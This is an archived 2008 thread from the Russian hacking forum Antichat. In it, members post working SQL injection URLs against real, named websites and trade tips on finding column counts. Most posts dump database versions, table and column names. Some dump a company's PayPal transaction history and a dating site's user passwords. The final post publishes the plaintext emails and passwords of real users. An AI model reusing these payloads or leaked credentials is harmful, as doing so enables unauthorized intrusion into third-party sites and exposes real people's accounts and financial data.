ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.01.2008, 15:55
|
|
Постоянный
Регистрация: 22.11.2006
Сообщений: 473
Провел на форуме:
2461137
Репутация:
216
|
|
вот такой приколяк....
http://www.mg-portal.com.ua/index.php?st=0&lang=0&id=4+AND+1=0+union+select+0, 0,0,concat(char(80),char(114),char(101),char(118), char(101),char(100)),concat(char(89),%20char(97),c har(32),char(103),char(108),char(117),char(107))
а команду выполнит не получилось..
|
|
|
11.01.2008, 18:23
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
http://www.bluebit.com.au/
http://www.bluebit.com.au/cms.php?id=-1+UNION+SELECT+1,concat_ws(0x3A,id,mc_gross,paymen t_gross,shipping,tax,mc_fee,payment_fee,mc_currenc y,txn_type,payment_date,payment_status,verify_sign ,txn_id,payment_type,receiver_id,item_name,item_nu mber,receipt_id,custID,rawData),3+FROM+bluebitbiz_ bluebit_com_au.ecom_paypal/*
Выводит полную историю PayPal операций конторы. Там они как то софт за 30$ штука продают  .
http://www.atcnt.com.au/
http://www.atcnt.com.au/page.php?id=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9,10/*
|
|
|
|
11.01.2008, 18:24
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
www.rayner.com
http://www.rayner.com/products.php?id=-22+union+select+1,2,3,table_name,5,6,7,8,9+from+in formation_schema.tables/*
Все таблицы.
http://www.rayner.com/products.php?id=-22+union+select+1,2,3,column_name,5,6,7,8,9+from+i nformation_schema.columns/*
Все поля.
|
|
|
|
11.01.2008, 18:35
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 331
Провел на форуме:
1724067
Репутация:
806
|
|
love.svadba.net.ru
http://love.svadba.net.ru/ankett.php?id=-10'+union+select+1,2,3,4,pass,id,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+fro m+users/*
в таблице users, такие поля pass,id, email, остальных не подбирал
и есть раскрытие путей:
Notice: Undefined variable: fname in /usr/local/psa/home/vhosts/svadba.net.ru/sub/love/ankett.php on line 7
сильно не рылся,но у них там форум есть большой.
Может кто жену ищет ему это поможет |
|
|
|
11.01.2008, 18:40
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
vip-tur.ru
Код HTML:
http://www.vip-tur.ru/?page=country&id=22+union+select+0,concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
USER  IMAFLEX_VIPTUR@LOCALHOST
VERSION:5.0.40
DATABASE IMAFLEX_VIPTUR
Код HTML:
http://www.vip-tur.ru/?page=country&id=22+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.tables/*
- имена всех таблиц
Код HTML:
http://www.vip-tur.ru/?page=country&id=22+union+select+0,column_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+information_schema.columns/*
- имена всех колонок
|
|
|
|
11.01.2008, 21:04
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344
Репутация:
48
|
|
Код HTML:
http://www.imc.pl.ua/katalog_ssilok.php?show_links=6+union+select+1,2,3,4,5,6,7,concat_ws(0x10a,version(),database(),user())/*
4.1.22-log
imc_imc
imc_imcb@localhost
я туговат в этом деле, но данные достал...
Только не кричите... что возвожно сделать с помощью этой инфы? |
|
|
|
11.01.2008, 21:27
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
WuWu, ну к information_schema там доступа нет, значит структуру их базы мы не узнаем. Да и чего там интересного вобще узнавать ? Форума у них нету. Авторизации для юзеров я тоже не нашел.. Не перспективно, имхо ))
---------------------------------------------------------------------------
http://www.jetcharter.ru/new/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6/*
4.0.26/jetcharterru/jetcharterru@62.213.73.13
|
|
|
|
11.01.2008, 22:15
|
|
Новичок
Регистрация: 16.12.2007
Сообщений: 27
Провел на форуме:
266344
Репутация:
48
|
|
нашол дырку в статистике сайта... вот, но немогу добраться до структуры!!
Код HTML:
http://www.top.iv-fr.net/stat.php?id=1+UNION+SELECT+1,2,3,4,/*
|
|
|
|
11.01.2008, 22:35
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Сообщение от WuWu
нашол дырку в статистике сайта... вот, но немогу добраться до структуры!!
Код HTML:
http://www.top.iv-fr.net/stat.php?id=1+UNION+SELECT+1,2,3,4,/*
Используй конструкцию order+by+1/* (подробнее читай в разделе статьи) Там 25 столбцов.
Код HTML:
http://www.top.iv-fr.net/stat.php?id=-1+union+select+0,1,2,3,concat(Version(),0x3a,USER(),0x3a,DATABASE()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
4.1.22-standard:ivfr_top1@localhost:ivfr_top
|
|
|
|
11.01.2008, 22:47
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от .Begemot.
Используй конструкцию order+by+1/* (подробнее читай в разделе статьи) Там 25 столбцов.
4.1.22-standard:ivfr_top1@localhost:ivfr_top
И нету доступа к information_schema ) После нескольких попыток перебора получаем
http://www.top.iv-fr.net/top.php?cat=-1+union+select+1,2,3,4,concat_ws(0x2F, mail,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25+from+ top_users/*
мейл/пароль
top@iv-fr.net/1
npetia@inbox.ru/8kl9mt
pp.majesty@online.ua/dwpa8g
и тд.
ЗЫ если хочешь поставить кому-нибудь плюс - жми на кнопку репутация в правом верхнем углу поста, а не на те +- под аватаркой ))
Последний раз редактировалось ElteRUS; 11.01.2008 в 22:55..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
